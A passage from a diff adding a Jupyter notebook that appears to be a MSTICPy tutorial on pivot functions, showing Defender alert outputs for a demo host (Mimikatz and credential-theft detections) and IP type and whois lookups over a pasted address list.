+       "      <td>{\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>Microsoft Defender Advanced Threat Protection</td>\n",
+       "      <td></td>\n",
+       "      <td>https://securitycenter.microsoft.com/alert/da637508847019595161_-562481393?tid=4b2462a4-bbee-495...</td>\n",
+       "      <td>New</td>\n",
+       "      <td>victim00.na.contosohotels.com</td>\n",
+       "      <td>CredentialAccess</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-03-11 14:30:14.730000+00:00</td>\n",
+       "      <td>'Mimikatz' hacktool was detected</td>\n",
+       "      <td>'Mimikatz' hacktool was detected</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Readily available tools, such as hacking programs, can be used by unauthorized individuals to sp...</td>\n",
+       "      <td>MDATP</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>da637510393722104539_-1180405651</td>\n",
+       "      <td>ef04126b-2683-0a98-d01c-77ee6b1115ac</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>WindowsDefenderAv</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-03-11 06:00:14.083000+00:00</td>\n",
+       "      <td>2021-03-11 06:00:14.083000+00:00</td>\n",
+       "      <td>2021-03-11 14:30:14.450000+00:00</td>\n",
+       "      <td>[\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...</td>\n",
+       "      <td>{\\r\\n  \"MicrosoftDefenderAtp.Category\": \"Malware\",\\r\\n  \"MicrosoftDefenderAtp.InvestigationId\": ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>Microsoft Defender Advanced Threat Protection</td>\n",
+       "      <td></td>\n",
+       "      <td>https://securitycenter.microsoft.com/alert/da637510393722104539_-1180405651?tid=4b2462a4-bbee-49...</td>\n",
+       "      <td>New</td>\n",
+       "      <td>victim00.na.contosohotels.com</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId                    TimeGenerated  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d 2021-03-11 12:05:14.355000+00:00   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d 2021-03-11 13:24:53.495000+00:00   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d 2021-03-11 13:24:53.490000+00:00   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d 2021-03-11 13:19:42.521000+00:00   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d 2021-03-11 14:30:14.730000+00:00   \n",
+       "\n",
+       "                                     AlertDisplayName  \\\n",
+       "0                 Suspected credential theft activity   \n",
+       "1                    'Mimikatz' hacktool was detected   \n",
+       "2                 Suspected credential theft activity   \n",
+       "3  Malicious credential theft tool execution detected   \n",
+       "4                    'Mimikatz' hacktool was detected   \n",
+       "\n",
+       "                                            AlertName Severity  \\\n",
+       "0                 Suspected credential theft activity   Medium   \n",
+       "1                    'Mimikatz' hacktool was detected      Low   \n",
+       "2                 Suspected credential theft activity   Medium   \n",
+       "3  Malicious credential theft tool execution detected     High   \n",
+       "4                    'Mimikatz' hacktool was detected      Low   \n",
+       "\n",
+       "                                                                                           Description  \\\n",
+       "0  This program exhibits suspect characteristics potentially associated with credential theft.  Onc...   \n",
+       "1  Readily available tools, such as hacking programs, can be used by unauthorized individuals to sp...   \n",
+       "2  This program exhibits suspect characteristics potentially associated with credential theft.  Onc...   \n",
+       "3  A known credential theft tool execution command line was detected.\\nEither the process itself or...   \n",
+       "4  Readily available tools, such as hacking programs, can be used by unauthorized individuals to sp...   \n",
+       "\n",
+       "  ProviderName VendorName                  VendorOriginalId  \\\n",
+       "0        MDATP  Microsoft   da637509097413415122_-841817867   \n",
+       "1        MDATP  Microsoft  da637510393722104539_-1180405651   \n",
+       "2        MDATP  Microsoft   da637509097413415122_-841817867   \n",
+       "3        MDATP  Microsoft   da637508847019595161_-562481393   \n",
+       "4        MDATP  Microsoft  da637510393722104539_-1180405651   \n",
+       "\n",
+       "                          SystemAlertId ResourceId SourceComputerId  \\\n",
+       "0  bf226b1b-8bda-31f7-c848-1f8bbb5f5922                               \n",
+       "1  ef04126b-2683-0a98-d01c-77ee6b1115ac                               \n",
+       "2  bf226b1b-8bda-31f7-c848-1f8bbb5f5922                               \n",
+       "3  753680a5-4d20-2726-61b4-9c36e620ea26                               \n",
+       "4  ef04126b-2683-0a98-d01c-77ee6b1115ac                               \n",
+       "\n",
+       "            AlertType ConfidenceLevel  ConfidenceScore  IsIncident  \\\n",
+       "0  WindowsDefenderAtp                              NaN       False   \n",
+       "1   WindowsDefenderAv                              NaN       False   \n",
+       "2  WindowsDefenderAtp                              NaN       False   \n",
+       "3  WindowsDefenderAtp                              NaN       False   \n",
+       "4   WindowsDefenderAv                              NaN       False   \n",
+       "\n",
+       "                      StartTimeUtc                       EndTimeUtc  \\\n",
+       "0 2021-03-09 17:56:55.275000+00:00 2021-03-09 17:56:55.275000+00:00   \n",
+       "1 2021-03-11 06:00:14.083000+00:00 2021-03-11 06:00:14.083000+00:00   \n",
+       "2 2021-03-09 17:56:55.275000+00:00 2021-03-09 17:56:55.275000+00:00   \n",
+       "3 2021-03-09 10:56:58.134000+00:00 2021-03-09 10:56:58.134000+00:00   \n",
+       "4 2021-03-11 06:00:14.083000+00:00 2021-03-11 06:00:14.083000+00:00   \n",
+       "\n",
+       "                 ProcessingEndTime  \\\n",
+       "0 2021-03-11 12:05:13.759000+00:00   \n",
+       "1 2021-03-11 13:24:53.379000+00:00   \n",
+       "2 2021-03-11 13:24:53.363000+00:00   \n",
+       "3 2021-03-11 13:19:42.289000+00:00   \n",
+       "4 2021-03-11 14:30:14.450000+00:00   \n",
+       "\n",
+       "                                                                                      RemediationSteps  \\\n",
+       "0  [\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...   \n",
+       "1  [\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...   \n",
+       "2  [\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...   \n",
+       "3  [\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...   \n",
+       "4  [\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...   \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...   \n",
+       "1  {\\r\\n  \"MicrosoftDefenderAtp.Category\": \"Malware\",\\r\\n  \"MicrosoftDefenderAtp.InvestigationId\": ...   \n",
+       "2  {\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...   \n",
+       "3  {\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...   \n",
+       "4  {\\r\\n  \"MicrosoftDefenderAtp.Category\": \"Malware\",\\r\\n  \"MicrosoftDefenderAtp.InvestigationId\": ...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...   \n",
+       "\n",
+       "  SourceSystem WorkspaceSubscriptionId WorkspaceResourceGroup ExtendedLinks  \\\n",
+       "0    Detection                                                                \n",
+       "1    Detection                                                                \n",
+       "2    Detection                                                                \n",
+       "3    Detection                                                                \n",
+       "4    Detection                                                                \n",
+       "\n",
+       "                                     ProductName ProductComponentName  \\\n",
+       "0  Microsoft Defender Advanced Threat Protection                        \n",
+       "1  Microsoft Defender Advanced Threat Protection                        \n",
+       "2  Microsoft Defender Advanced Threat Protection                        \n",
+       "3  Microsoft Defender Advanced Threat Protection                        \n",
+       "4  Microsoft Defender Advanced Threat Protection                        \n",
+       "\n",
+       "                                                                                             AlertLink  \\\n",
+       "0  https://securitycenter.microsoft.com/alert/da637509097413415122_-841817867?tid=4b2462a4-bbee-495...   \n",
+       "1  https://securitycenter.microsoft.com/alert/da637510393722104539_-1180405651?tid=4b2462a4-bbee-49...   \n",
+       "2  https://securitycenter.microsoft.com/alert/da637509097413415122_-841817867?tid=4b2462a4-bbee-495...   \n",
+       "3  https://securitycenter.microsoft.com/alert/da637508847019595161_-562481393?tid=4b2462a4-bbee-495...   \n",
+       "4  https://securitycenter.microsoft.com/alert/da637510393722104539_-1180405651?tid=4b2462a4-bbee-49...   \n",
+       "\n",
+       "  Status              CompromisedEntity           Tactics           Type  \\\n",
+       "0    New  victim00.na.contosohotels.com  CredentialAccess  SecurityAlert   \n",
+       "1    New  victim00.na.contosohotels.com           Unknown  SecurityAlert   \n",
+       "2    New  victim00.na.contosohotels.com  CredentialAccess  SecurityAlert   \n",
+       "3    New  victim00.na.contosohotels.com  CredentialAccess  SecurityAlert   \n",
+       "4    New  victim00.na.contosohotels.com           Unknown  SecurityAlert   \n",
+       "\n",
+       "   Computer src_hostname src_accountname src_procname  host_match  acct_match  \\\n",
+       "0  victim00     victim00                                     True       False   \n",
+       "1  victim00     victim00                                     True       False   \n",
+       "2  victim00     victim00                                     True       False   \n",
+       "3  victim00     victim00                                     True       False   \n",
+       "4  victim00     victim00                                     True       False   \n",
+       "\n",
+       "   proc_match  \n",
+       "0       False  \n",
+       "1       False  \n",
+       "2       False  \n",
+       "3       False  \n",
+       "4       False  "
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Host.AzureSentinel.SecurityAlert_list_related_alerts(host_name=\"victim00\").head(5)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We also have a preview of a notebook tool that lets you\n",
+    "browser around entities and their pivot functions, search\n",
+    "for a function by keyword and view the help for that function.\n",
+    "This is going to be released shortly.\n",
+    "\n",
+    "> <p style=\"color:red\"><b>Warning:</b> post-0.9.0 functionality</p>\n",
+    "> This will throw and error in v0.9.0 of MSTICPy"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "78396986891647eebd7f6f2d183cfa71",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HBox(children=(VBox(children=(HTML(value='<b>Entities</b>'), Select(description='entity', layou…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Pivot.browse()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Standardized way of calling Pivot functions\n",
+    "\n",
+    "Due to various factors (historical, underlying data,\n",
+    "developer laziness and forgetfullness, etc.) the functionality\n",
+    "in *MSTICPy* can be inconsistent in the way it uses input\n",
+    "parameters.\n",
+    "\n",
+    "Also, many functions will only accept inputs as a single\n",
+    "value, or a list or a DataFrame or some unpredictable combination\n",
+    "of these.\n",
+    "\n",
+    "Pivot functions allow you to largely forget about this - you\n",
+    "can use the same function whether you have:\n",
+    "- a single value\n",
+    "- a list (or any iterable) of values\n",
+    "- a DataFrame with the input value in one of the columns.\n",
+    "\n",
+    "Let's take an example. \n",
+    "\n",
+    "Suppose we have a set of IP addresses pasted\n",
+    "from somewhere that we want to use as input."
+   ]
+  },
+  {
+   "cell_type": "raw",
+   "metadata": {},
+   "source": [
+    "0, 172.217.15.99, Public\n",
+    "1, 40.85.232.64, Public\n",
+    "2, 20.38.98.100, Public\n",
+    "3, 23.96.64.84, Public\n",
+    "4, 65.55.44.108, Public\n",
+    "5, 131.107.147.209, Public\n",
+    "6, 10.0.3.4, Private\n",
+    "7, 10.0.3.5, Private\n",
+    "8, 13.82.152.48, Public"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We need to convert this into a Python data object of some sort.\n",
+    "To do this we can use another Pivot utility `%%txt2df`. This is a\n",
+    "Jupyter/IPython magic function so you can just paste you data in\n",
+    "a cell.\n",
+    "Use `%%txt2df --help` in an empty cell to see the full syntax.\n",
+    "\n",
+    "The example below we specify a comma separator, that the\n",
+    "data has a headers row and to save the converted data as\n",
+    "a DataFrame named \"ip_df\".\n",
+    "\n",
+    "> Warning this will overwrite any existing variable of this\n",
+    "name"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>idx</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>type</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>4</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>5</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>6</td>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>7</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>8</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   idx               ip     type\n",
+       "0    0    172.217.15.99   Public\n",
+       "1    1     40.85.232.64   Public\n",
+       "2    2     20.38.98.100   Public\n",
+       "3    3      23.96.64.84   Public\n",
+       "4    4     65.55.44.108   Public\n",
+       "5    5  131.107.147.209   Public\n",
+       "6    6         10.0.3.4  Private\n",
+       "7    7         10.0.3.5  Private\n",
+       "8    8     13.82.152.48   Public"
+      ]
+     },
+     "execution_count": 25,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "%%txt2df --sep , --headers --name ip_df\n",
+    "idx, ip, type\n",
+    "0, 172.217.15.99, Public\n",
+    "1, 40.85.232.64, Public\n",
+    "2, 20.38.98.100, Public\n",
+    "3, 23.96.64.84, Public\n",
+    "4, 65.55.44.108, Public\n",
+    "5, 131.107.147.209, Public\n",
+    "6, 10.0.3.4, Private\n",
+    "7, 10.0.3.5, Private\n",
+    "8, 13.82.152.48, Public\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "For our example we'll also create a standard Python list\n",
+    "from the ip column."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['172.217.15.99', '40.85.232.64', '20.38.98.100', '23.96.64.84', '65.55.44.108', '131.107.147.209', '10.0.3.4', '10.0.3.5', '13.82.152.48']\n"
+     ]
+    }
+   ],
+   "source": [
+    "ip_list = list(ip_df.ip)\n",
+    "print(ip_list)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### How did this work before?\n",
+    "\n",
+    "If you recall the earlier example of `get_ip_type`, passing it\n",
+    "a list or DataFrame doesn't result in anything useful."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['172.217.15.99', '40.85.232.64', '20.38.98.100', '23.96.64.84', '65.55.44.108', '131.107.147.209', '10.0.3.4', '10.0.3.5', '13.82.152.48'] does not appear to be an IPv4 or IPv6 address\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "'Unspecified'"
+      ]
+     },
+     "execution_count": 27,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "get_ip_type(ip_list)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Pivot versions are (somewhat) agnostic to input data format"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "However, the pivotized version can accept and correctly process\n",
+    "a list"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                ip   result\n",
+       "0    172.217.15.99   Public\n",
+       "1     40.85.232.64   Public\n",
+       "2     20.38.98.100   Public\n",
+       "3      23.96.64.84   Public\n",
+       "4     65.55.44.108   Public\n",
+       "5  131.107.147.209   Public\n",
+       "6         10.0.3.4  Private\n",
+       "7         10.0.3.5  Private\n",
+       "8     13.82.152.48   Public"
+      ]
+     },
+     "execution_count": 28,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.util.ip_type(ip_list)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "In the case of a DataFrame, things are a little more\n",
+    "complicated - we have to tell the function \n",
+    "the name of the column that\n",
+    "contains the input data."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 29,
+   "metadata": {},
+   "outputs": [
+    {
+     "ename": "KeyError",
+     "evalue": "(\"'ip_column' is not in the input dataframe\", 'Please specify the column when calling the function.You can use one of the parameter names for this:', ['column', 'input_column', 'input_col', 'src_column', 'src_col'])",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+      "\u001b[1;31mKeyError\u001b[0m                                  Traceback (most recent call last)",
+      "\u001b[1;32m<ipython-input-29-786e8d7fe15b>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mIpAddress\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mwhois\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mip_df\u001b[0m\u001b[1;33m)\u001b[0m  \u001b[1;31m# won't work!\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+      "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\datamodel\\pivot_register.py\u001b[0m in \u001b[0;36mpivot_lookup\u001b[1;34m(*args, **kwargs)\u001b[0m\n\u001b[0;32m    172\u001b[0m         \u001b[1;31m# {\"data\": input_df, \"src_column\": input_column}\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    173\u001b[0m         input_df, input_column, param_dict = _create_input_df(\n\u001b[1;32m--> 174\u001b[1;33m             \u001b[0minput_value\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mpivot_reg\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent_kwargs\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    175\u001b[0m         )\n\u001b[0;32m    176\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
+      "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\datamodel\\pivot_register.py\u001b[0m in \u001b[0;36m_create_input_df\u001b[1;34m(input_value, pivot_reg, parent_kwargs)\u001b[0m\n\u001b[0;32m    326\u001b[0m                 \u001b[1;34m\"Please specify the column when calling the function.\"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    327\u001b[0m                 \u001b[1;34m\"You can use one of the parameter names for this:\"\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 328\u001b[1;33m                 \u001b[0m_DF_SRC_COL_PARAM_NAMES\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    329\u001b[0m             )\n\u001b[0;32m    330\u001b[0m     \u001b[1;31m# we want to get rid of data=xyz parameters from kwargs, since we're adding them\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+      "\u001b[1;31mKeyError\u001b[0m: (\"'ip_column' is not in the input dataframe\", 'Please specify the column when calling the function.You can use one of the parameter names for this:', ['column', 'input_column', 'input_col', 'src_column', 'src_col'])"
+     ]
+    }
+   ],
+   "source": [
+    "IpAddress.util.whois(ip_df)  # won't work!"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 30,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>15169</td>\n",
+       "      <td>172.217.15.0/24</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2012-04-16</td>\n",
+       "      <td>GOOGLE, US</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>[{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>40.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-02-23</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>[{'cidr': '40.80.0.0/12, 40.124.0.0/16, 40.74.0.0/15, 40.76.0.0/14, 40.120.0.0/14, 40.125.0.0/17...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.36.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.34.0.0/15, 20.36.0.0/14, 20.64.0.0/10, 20.40.0.0/13, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>23.96.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2013-06-18</td>\n",
